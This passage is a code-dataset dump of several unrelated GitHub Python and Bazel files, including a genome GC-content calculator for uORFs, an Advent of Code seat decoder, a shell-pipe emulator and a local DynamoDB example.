files names are passed as arguments\n if (len(sys.argv)!=4 or sys.argv[1].find(\".uORFs\")==-1 or sys.argv[2].find(\".cds\")==-1 or sys.argv[3].find(\".fasta\")==-1):\n print(\"\\n----------------------------------------------------------------------------------------------------\\n\")\n print(\"\\nUsage:\\npython GCContentORFsCdsCirc.py [file_path_name.uORFs] [file_path_name.cds] [file_path_name.fasta]\\n\")\n sys.exit(0)\n\n #Get path/file names\n uORFs_file_name=sys.argv[1]\n cds_file_name=sys.argv[2]\n fasta_file_name=sys.argv[3]\n\n #Check if path/files exists\n if (path.exists(uORFs_file_name)==False or path.exists(cds_file_name)==False or path.exists(fasta_file_name)==False):\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n print(\"\\nOne or more files not found! Check the path and file names.\\n\")\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n exit(0)\n\n #Open input files\n uORFs_file=open(uORFs_file_name,'r') \n cds_file=open(cds_file_name, 'r')\n fasta_file=open(fasta_file_name,'r')\n\n #Open output files. The ID filename in uORFs file is used to generate the result files ('.gct' and '.csv')\n if (os.name==\"nt\"):\n uORFs_file_name=uORFs_file_name.strip(\".\\\\\")\n output_file_name=uORFs_file_name[0:uORFs_file_name.find(\".\")]\n output_gct_file=open(output_file_name+\".gct\",'w')\n #The csv file was generated to help analyze the results. Each row of 'csv' file represent a nucleotide position in the whole genome. \n #The idea is as follows:\n #Row value= 0 = indicates the nucleotide belongs a non coding region\n #Row value= 1 = indicates the nucleotide belongs a coding region\n #Row value= 2 = indicates the nucleotide belongs a coding region and to 2 genes. \n #Row value= 10 = indicates the nucleotide belongs a non coding region and to a uORF\n #Row value= 11 = indicates the nucleotide belongs a coding region and to a uORF\n #Row value= 12 = indicates the nucleotide belongs a coding region, to a uORF and 2 genes\n #Row value= 22 = indicates the nucleotide belongs a coding region, to 2 uORFs and 2 genes\n #and so on\n #The strip will remove '.\\' that appear on console in Windows 10 before path\\filename \n output_csv_file=open(output_file_name+\".csv\",'w')\n\n return uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file \n\n\n#This function creates a numerical array (genome_array) which will tell us where the coding, non coding and uORFs are.\n#Based on cds file, the genome_array returned from it contains the data of coding and noncoding regions of genes detailed in GenBank \ndef createGenomeArray(cds_file):\n #genome_array represent the whole genome. 
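(the cds input format is illustrated in the editor's note just below.)\n    # (editor's illustrative note, not part of the original script) the cds file, generated by the\n    # getGenesGenBank2Cds.py script, is expected to contain a \"Genome size: \" line giving the total\n    # length plus one \"start;end#...\" line per coding region; e.g. a hypothetical line \"1200;2500#cox1\"\n    # would mark nucleotides 1200..2500 (inclusive) as coding, and a range whose end precedes its start\n    # wraps around to position 1 (circular genome).\n    #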
Position 0 is not used.\n genome_array=[]\n genome_size=0\n #Loop to get data from cds file\n for line in cds_file: \n #get total genome size from cds file\n if (line.find(\"Genome size: \")!=-1):\n genome_size=int(line[13:]) \n #Instantiate size of genome in genome_array and populates with value=0\n genome_array=[0]*(genome_size+1)\n \n #Get start and end positions of coding regions (genes on cds)\n if (line.find(\";\")!=-1):\n aux_index=line.find(\";\")\n line=line.strip()\n start=int(line[:aux_index])\n end=int(line[aux_index+1:line.find(\"#\")])\n #Loop to register nucleotides that belong to coding regions, based on start and end positions retrieved\n #This adds +1 every time a nucleotide belong to a gene in cds file\n #To contemplate the circular genome, we use a while loop to process every nucleotide in the sequence\n i=start\n while True:\n genome_array[i]=genome_array[i]+1\n if (i==end):\n break\n i=i+1\n #Check if it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n return genome_size,genome_array\n\ndef checkCG(nc_char):\n if (nc_char=='C' or nc_char=='G'):\n return True\n else:\n return False\n\n#This function calculates the GC content of the coding and non coding regions of a sequence. Using the genome_array as input,\n#its possible to determinte the GC content in coding and non coding regions. \ndef gcContentCalc(start, end, sequence, genome_array):\n #seq_cds store the sequence of nucleotides that are part of the coding region. Those nucleotides that are not part of the coding region are replaced by '-'\n seq_cds=\"\"\n #sum_GC_nc store the sum of GC nucleotides in the sequence\n sum_GC_nc=0\n #sum_GC_nc_cds store the sum of GC nucleotides that are part of coding region in the sequence\n sum_GC_nc_cds=0\n #sum_nc_cds store the sum of ALL nucleotides that are part of coding region in the sequence\n sum_nc_cds=0\n #For every nucleotide in the sequence we do a while loop which comtemplate the circular genome\n #Here we have a sequence of interest being compared and saved on seq_cds, because of this we have a second iterator\n i=start\n seq_it=0\n while True:\n if (checkCG(sequence[seq_it])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n elif (genome_array[i]%10>0):\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n #Adding +10 to genome_array will help later check where are the nucleotides that belong to uORFs in csv file\n #Values greater than or equal 10\n genome_array[i]=genome_array[i]+10\n if (i==end):\n break\n i=i+1\n seq_it=seq_it+1\n #Check if 'i' it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n tam_seq=len(sequence)\n #The next command line returns: proportion of GC nucleotides in the sequence\n #Nucleotides in coding region of the sequence\n #Total of GC nucleotides in the sequence\n #Total of GC nucleotides in the coding region of the sequence\n #Total of nucleotides in the coding region of the sequence\n return seq_cds, sum_GC_nc, sum_GC_nc_cds, sum_nc_cds\n\n\n#This function read the whole genome from fasta file\ndef readWholeGenome(fasta_file):\n 
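# (editor's illustrative note, not part of the original script) for a hypothetical FASTA input such as\n    #   >chrM example header   (header lines starting with '>' are skipped)\n    #   acgTAcg\n    #   TTGA\n    # the returned string is \" ACGTACGTTGA\": lines are upper-cased, stripped and concatenated,\n    # with a leading space so that the first nucleotide sits at index 1.\n    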
#The position 0 of whole_genome will not be used\n whole_genome=\" \"\n for line in fasta_file:\n if(line[0]!=\">\"):\n line=line.upper()\n whole_genome=whole_genome+line.strip()\n fasta_file.close()\n return whole_genome\n\n#Funtion that prints and save on output file the individual ORFs results\ndef printSaveuORFsResults(name_ORF,seq_ORF,sum_ORF_cds,start_ORF,end_ORF,ratio_GC_ORF,ratio_GC_ORF_cds,output_gct_file):\n print(\"____________________________________________________________\")\n print(name_ORF)\n print(\"uORf original sequence:\\n\"+seq_ORF+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds)\n print(start_ORF, end_ORF)\n print(\"GC Content of Orf:\",round(ratio_GC_ORF,2))\n print(\"GC Content of Orf in CDS:\",round(ratio_GC_ORF_cds,2))\n output_gct_file.write(name_ORF)\n output_gct_file.write(str(start_ORF)+\",\"+str(end_ORF)+\"\\n\")\n output_gct_file.write(\"uORf original sequence:\\n\"+seq_ORF.rstrip()+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds+\"\\n\")\n output_gct_file.write(\"Conteudo GC Orf: \"+str(round(ratio_GC_ORF,2))+\"\\nConteudo GC Orf CDS: \"+str(round(ratio_GC_ORF_cds,2))+\"\\n\\n\")\n\n#Function that reads the uORFs file and calculate GC content for each one of the ORFs listed in it. Summary variables are returned as result.\ndef uORFsFileGCCalc(uORFs_file, genome_array, output_gct_file):\n name_ORF=\"\"\n #Total number of GC ORFs nucleotides\n sum_nc_GC_ORFs=0\n #Total number of GC ORFs nucleotides that are part of coding regions\n sum_nc_GC_ORFs_cds=0\n #Total number of ORFs nucleotides\n sum_nc_ORFs=0\n #Total number of ORFs nucleotides in coding regions\n sum_nc_ORFs_cds=0\n for line in uORFs_file:\n if (line.find(\">\")!=-1):\n name_ORF=line[1:]\n elif (line.find(\"+\")!=-1):\n start_ORF=int(line[1:])\n elif (line.find(\"-\")!=-1):\n end_ORF=int(line[1:])\n elif (line.find(\"@\")!=-1):\n seq_ORF=line[1:].upper().strip()\n size_ORF=len(seq_ORF)\n #Call function that calculate GC Content and update genome_array\n sum_ORF_cds, sum_GC_ORF_nc, sum_GC_ORF_nc_cds, sum_ORF_nc_cds=gcContentCalc(start_ORF, end_ORF, seq_ORF, genome_array)\n\n #Ratio_GC_ORF shows the proportion of GC nucleotides of the sequence\n ratio_GC_ORF=sum_GC_ORF_nc/len(seq_ORF)*100\n\n #Ratio_GC_ORF_cds shows the proportion of GC nucleotides in the coding region of the sequence\n ratio_GC_ORF_cds=0\n #Check to avoid division by 0\n if (sum_ORF_nc_cds>0):\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/sum_ORF_nc_cds*100\n else:\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/1*100\n #Print and save in output files the ORF values\n printSaveuORFsResults(name_ORF, seq_ORF, sum_ORF_cds, start_ORF, end_ORF, ratio_GC_ORF, ratio_GC_ORF_cds, output_gct_file)\n\n sum_nc_GC_ORFs=sum_nc_GC_ORFs + sum_GC_ORF_nc\n sum_nc_GC_ORFs_cds=sum_nc_GC_ORFs_cds + sum_GC_ORF_nc_cds\n sum_nc_ORFs=sum_nc_ORFs+size_ORF\n sum_nc_ORFs_cds=sum_nc_ORFs_cds+sum_ORF_nc_cds\n\n #Return summary values\n return sum_nc_GC_ORFs,sum_nc_GC_ORFs_cds,sum_nc_ORFs,sum_nc_ORFs_cds,sum_nc_ORFs-sum_nc_ORFs_cds\n\n#Print and saves on input file the final summary results\ndef printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\n sum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file):\n\n print(\"____________________________________________________________\")\n print(\"\\n\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"Whole genome total size 
= \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\")\n print(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\")\n print(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\")\n print(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\") \n print(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\")\n print(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\")\n else:\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n\n output_gct_file.write(\"\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n output_gct_file.write(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\\n\")\n output_gct_file.write(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\\n\") \n output_gct_file.write(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, 
corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\\n\")\n output_gct_file.write(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\\n\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\\n\")\n else:\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n#Calculate GC content in whole Genome\ndef wholeGenomeGCCalc(output_csv_file,output_gct_file,whole_genome, genome_array):\n #Total of nucleotides in the whole genome that belongs to coding regions\n sum_nc_genome_cds=0\n #Total of nucleotides in the whole genome that belongs to non coding regions\n sum_nc_genome_noncod=0\n #Total of GC nucleotides in the whole genome that belongs to coding regions\n sum_GC_nc_cds=0\n #Total of GC nucleotides in the whole genome\n sum_GC_nc=0\n\n for i in range(1,len(genome_array)):\n output_csv_file.write(str(genome_array[i])+\"\\n\")\n if (checkCG(whole_genome[i])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_genome_cds=sum_nc_genome_cds+1\n elif (genome_array[i]%10>0):\n sum_nc_genome_cds=sum_nc_genome_cds+1\n\n return sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc\n\n\ndef main():\n\n uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file =checkInputFiles()\n\n #Call function that reads data from 'cds' file, creating genome_array\n genome_size,genome_array = createGenomeArray(cds_file)\n\n #Call function to read whole genome from fasta file\n whole_genome=readWholeGenome(fasta_file)\n\n #Call function to calculate GC Content of uORfs\n sum_nc_GC_ORFs, sum_nc_GC_ORFs_cds, sum_nc_ORFs, sum_nc_ORFs_cds,sum_size_uorfs_noncod=uORFsFileGCCalc(uORFs_file,genome_array,output_gct_file)\n\n #Call function to calculate GC Content of whole genome\n sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc=wholeGenomeGCCalc(output_csv_file,output_gct_file, whole_genome, genome_array)\n sum_nc_genome_noncod=genome_size-sum_nc_genome_cds\n sum_GC_nc_noncod=sum_GC_nc-sum_GC_nc_cds\n\n #Calculate number of ORFs nucleotides in non coding regions\n sum_nc_ORFs_noncod=sum_nc_ORFs-sum_nc_ORFs_cds\n \n #Print final 
summary\n printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\nsum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file)\n\n print(\"\\n\\n____________________________________________________________\")\n print(\"\\n\\nResults saved in: \"+str(output_gct_file.name)+\" e \"+str(output_csv_file.name)+\"\\n\")\n print(\"____________________________________________________________\\n\\n\\n\")\n\n uORFs_file.close()\n cds_file.close()\n output_csv_file.close()\n output_gct_file.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"paulaluize/mitogenomes","sub_path":"GCContentuORfsCdsCirc.py","file_name":"GCContentuORfsCdsCirc.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8324209012","text":"from dataclasses import dataclass, field\nimport logging\n\nTEST_INPUT = [\n 'FBFBBFFRLR',\n 'BFFFBBFRRR',\n 'FFFBBBFRRR',\n 'BBFFBBFRLL',\n]\n\nNUM_ROWS = 128\nNUM_COLS = 8\n\ndef divide_seats(string, inc_char, seats):\n offset = 0\n logging.debug(string)\n for char in string:\n seats /= 2\n logging.debug(char)\n if char == inc_char:\n offset += seats\n logging.debug(f' upper half: {offset}, +{seats}')\n else:\n logging.debug(f' lower half: {offset}, +0')\n return int(offset)\n\ndef parse_front_back(string, seats=128):\n return divide_seats(string, 'B', seats)\n\ndef parse_left_right(string, seats=8):\n return divide_seats(string, 'R', seats)\n\ndef decode_seat_code(string: str) -> 'Seat':\n row_code = string[:7]\n column_code = string[7:]\n return Seat(parse_front_back(row_code), parse_left_right(column_code))\n\n@dataclass(frozen=True)\nclass Seat:\n\n row: int\n column: int\n seat_id: int = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(self, 'seat_id', (self.row * 8) + self.column)\n\n\ndef tests():\n print('Tests\\n-----\\n')\n results = [decode_seat_code(code) for code in TEST_INPUT]\n print(results)\n\ndef main():\n print('Main\\n----\\n')\n\n with open(\"input_1.txt\", 'r') as input_file:\n results = [decode_seat_code(code.strip()) for code in input_file.readlines()]\n\n print('Max seat ID: ', max(s.seat_id for s in results))\n \n all_seats = {Seat(row, column) for row in range(NUM_ROWS) for column in range(NUM_COLS)}\n missing_seats = all_seats.difference(results)\n results = sorted(missing_seats, key=lambda e: e.row)\n for r in results:\n print(r)\n\n\nif __name__ == '__main__':\n tests()\n print('')\n main()\n","repo_name":"rpw505/aoc_2020","sub_path":"day_05/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190270487","text":"import numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\nfrom chemtools.utils.cube import UniformGrid\n\n\nhelp_cube = \"\"\"\ncubic grid used for evaluation and visualization.\nThis can be either a cube file with .cube extension, or a user-defined\ncubic grid specified by comma-separated spacing and extension values,\ne.g., 0.2,5.0 specifies 0.2 a.u. distance between grid points, and 5.0 a.u.\nextension on each side of molecule. 
[default=%(default)s]\n\"\"\"\n\n\ndef load_molecule_and_grid(fname, cube):\n \"\"\"Return instances of molecule and uniform cubic grid.\n\n Parameters\n ----------\n fname : str\n Path to wave-function file.\n cube : str\n Uniform cubic grid specifications.\n\n \"\"\"\n # load molecule\n mol = Molecule.from_file(fname)\n\n if cube.endswith(\".cube\"):\n # load & check cube file\n cube = UniformGrid.from_cube(cube)\n if np.allclose(mol.numbers, cube.numbers):\n raise ValueError(\"Atomic number in {0} & {1} should be the same!\".format(fname, cube))\n if np.allclose(mol.coordinates, cube.coordinates):\n raise ValueError(\n \"Atomic coordinates in {0} & {1} should be the same!\".format(cube.fname, cube.cube)\n )\n elif len(cube.split(\",\")) == 2:\n # make a cubic grid\n spacing, extension = [float(item) for item in cube.split(\",\")]\n cube = UniformGrid.from_molecule(mol, spacing=spacing, extension=extension, rotate=True)\n\n else:\n raise ValueError(\"Argument cube={0} is not recognized!\".format(cube))\n\n return mol, cube\n","repo_name":"theochem/chemtools","sub_path":"chemtools/scripts/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"32795615141","text":"def _compile_single(ctx):\n yasm_path = \"yasm \"\n args = []\n\n if ctx.attr.arch == \"x64\":\n args += [\"-felf64\", \"-D__x86_64__\", \"-DELF\"]\n else:\n args += [\"-felf\", \"-D__x86__\", \"-DELF\"]\n\n args += ctx.attr.defines\n\n include_paths = []\n include_paths += [\"-I./\" + e.path for e in ctx.files.includes]\n args += include_paths\n args += [ctx.file.src.path]\n args += [\"-o \", ctx.outputs.out.path]\n\n command = yasm_path + \" \".join(args)\n ctx.action(\n mnemonic = \"YasmCompile\",\n inputs = [ctx.file.src] + ctx.files.deps,\n outputs = [ctx.outputs.out],\n command = command,\n )\n\n return struct(files = set([ctx.outputs.out]))\n\n_yasm_compile_attrs = {\n \"src\": attr.label(allow_files = FileType([\".asm\"]),\n single_file = True),\n \"arch\": attr.string(default = \"x64\"),\n \"includes\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(allow_files = True),\n \"defines\": attr.string_list(),\n}\n\nyasm_compile = rule(\n _compile_single,\n attrs = _yasm_compile_attrs,\n outputs = {\n \"out\": \"%{name}.o\"\n }\n)\n\ndef yasm_library(name, arch=None, srcs=None, deps=[], includes=[], defines=[], visibility=None):\n yasm_objs = []\n for src in srcs:\n yasm_objs += [yasm_compile(name = src[:-4],\n arch = arch,\n src = src,\n deps = deps,\n includes = includes,\n defines = defines)]\n lablels = [e.label() for e in yasm_objs]\n native.cc_library(\n linkstatic = 1,\n name = name,\n visibility = visibility,\n srcs = lablels\n )\n \n\n\n","repo_name":"baranov1ch/squim","sub_path":"tools/build_rules/yasm.bzl","file_name":"yasm.bzl","file_ext":"bzl","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19882638668","text":"import subprocess\n\nif __name__ == \"__main__\":\n command = input(\"Introduceti comanda: \")\n command_list = []\n\n for c in command.split(\"|\"):\n command_list.append(filter(lambda c: c != \"\", c.split(\" \")))\n\n prev = subprocess.run(command_list[0], stdout=subprocess.PIPE)\n\n for c in command_list[1:]:\n prev = subprocess.run(c, input=prev.stdout, stdout=subprocess.PIPE)\n\n 
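# (editor's illustrative note, not part of the original script) for an input such as \"ls | grep py\",\n    # command_list holds the filtered argument sequences for \"ls\" and \"grep py\"; the first\n    # subprocess.run captures the stdout of \"ls\", which is then fed via input= to \"grep\",\n    # emulating a shell pipeline, and the decoded stdout of the last command is printed below.\n    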
print(f'{prev.stdout.decode(\"utf-8\")}')\n","repo_name":"Eduard975/PP","sub_path":"Teme/Tema11/Problema2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31103900998","text":"# Print the following pattern for the given number of rows.\n# Assume N is always odd.\n# Note : There is space after every star.\n# Pattern for N = 7\n# *\n# * *\n# * * *\n# * * * *\n# * * *\n# * *\n# *\n\n\nn=int(input())\nn1=(n//2)+1\ni=1\nwhile i<=n1:\n spaces=i-1\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=1\n while star<=i:\n print(\"* \",end=\"\")\n star +=1\n print()\n i=i+1\nn2=n//2\ni=1\nwhile i<=n2:\n spaces=n2-i\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=n2-i+1\n while star>=1:\n print(\"* \",end=\"\")\n star-=1\n print()\n i=i+1\n","repo_name":"LORDFLACKO0087/Python-Codes","sub_path":"Coding Ninjas/Patterns 2/Arrow pattern.py","file_name":"Arrow pattern.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821540585","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nfrom decimal import Decimal\nfrom pprint import pprint\nfrom loguru import logger\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\")\n\n\ndef load_data(devices, dynamodb=None):\n devices_table = dynamodb.Table('Devices')\n # Loop through all the items and load each\n for device in devices:\n device_id = (device['device_id'])\n datacount = device['datacount']\n # Print device info\n print(\"Loading Devices Data:\", device_id, datacount)\n devices_table.put_item(Item=device)\n\n\ndef create_devices_table(dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Table defination\n table = dynamodb.create_table(\n TableName='Devices',\n KeySchema=[\n {\n 'AttributeName': 'device_id',\n 'KeyType': 'HASH' # Partition key\n },\n {\n 'AttributeName': 'datacount',\n 'KeyType': 'RANGE' # Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'device_id',\n # AttributeType defines the data type. 
'S' is string type and 'N' is number type\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'datacount',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n # ReadCapacityUnits set to 10 strongly consistent reads per second\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10 # WriteCapacityUnits set to 10 writes per second\n }\n )\n return table\n\n\ndef create_user_table():\n table_name = 'Users'\n params = {\n 'TableName': table_name,\n 'KeySchema': [\n {'AttributeName': 'partition_key', 'KeyType': 'HASH'},\n {'AttributeName': 'sort_key', 'KeyType': 'RANGE'}\n ],\n 'AttributeDefinitions': [\n {'AttributeName': 'partition_key', 'AttributeType': 'N'},\n {'AttributeName': 'sort_key', 'AttributeType': 'N'}\n ],\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapcityUnits': 10\n },\n }\n table = dynamodb.create_table(**params)\n logger.info(f\"Creating table: {table_name}\")\n table.wait_until_exists()\n return table\n\n\ndef put_device(device_id, datacount, timestamp, temperature1, temperature2, temperature3, temperature4, temperature5, dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table\n devices_table = dynamodb.Table('Devices')\n response = devices_table.put_item(\n # Data to be inserted\n Item={\n 'device_id': device_id,\n 'datacount': datacount,\n 'info': {\n 'info_timestamp': timestamp,\n 'temperature1': temperature1,\n 'temperature2': temperature2,\n 'temperature3': temperature3,\n 'temperature4': temperature4,\n 'temperature5': temperature5\n }\n }\n )\n return response\n\n\ndef get_device(device_id, datacount):\n # Specify the table to read from\n devices_table = dynamodb.Table('Devices')\n\n try:\n response = devices_table.get_item(\n Key={'device_id': device_id, 'datacount': datacount})\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n return response['Item']\n\n\ndef scan_devices():\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table to scan\n devices_table = dynamodb.Table('Devices')\n response = devices_table.scan()\n print(response)\n items = response['Items']\n while 'LastEvaluatedKey' in response:\n print(response['LastEvaluatedKey'])\n response = devices_table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n print(items)\n\n\nif __name__ == '__main__':\n # device_table = create_devices_table()\n # Print table status\n # print(\"Status:\", device_table.table_status)\n\n # with open(\"../data.json\") as json_file:\n # device_list = json.load(json_file, parse_float=Decimal)\n # load_data(device_list)\n\n # device_resp = put_device(\"10001\", 3, \"1612522800\",\n # \"23.74\", \"32.56\", \"12.43\", \"44.74\", \"12.74\")\n # print(\"Create item successful.\")\n # # Print response\n # pprint(device_resp)\n\n device = get_device(\"10001\", 3, )\n if device:\n print(\"Get Device Data Done:\")\n # Print the data read\n print(device)\n\n # 